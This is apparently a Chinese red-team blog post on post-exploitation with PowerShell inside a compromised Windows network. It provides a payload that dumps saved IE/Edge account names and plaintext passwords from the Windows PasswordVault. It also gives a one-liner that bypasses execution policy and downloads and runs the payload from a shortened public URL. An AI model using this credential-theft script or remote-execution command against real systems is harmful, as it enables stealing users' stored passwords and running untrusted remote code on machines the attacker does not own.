大家好,这里是 渗透攻击红队 的第 41 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更
Powershell
内网渗透一直以来都是一个热门话题,试想在一个大型的内网环境下,当我们拿到了内网windows机器后,我们该如何通过他们去获取更多的所需资源,这就需要我们进行内网渗透了。然而在内网渗透中,除了kali、metasploit等高能的存在以外,还有一款神器也常常容易遭到忽略----PowerShell
Powershell 获取 IE 浏览器的账户密码信息
Powershell
首先需要的是一段 Powershell Payload:
代码语言:javascript复制[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password
我们可以把他放到公网上,这里有老外现成的了:http://bit.ly/2K75g15
如果你不想用它的域名,你也可以把 Powershell Payload 放到你自己的公网服务器上,然后使用 Powershell 调用它即可:
代码语言:javascript复制powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2K75g15')"
这个时候就能获取到你 IE 浏览器中的缓存信息,查找你保存的账户和密码信息。
参考文章:
https://github.com/HanseSecure/credgrap_ie_edge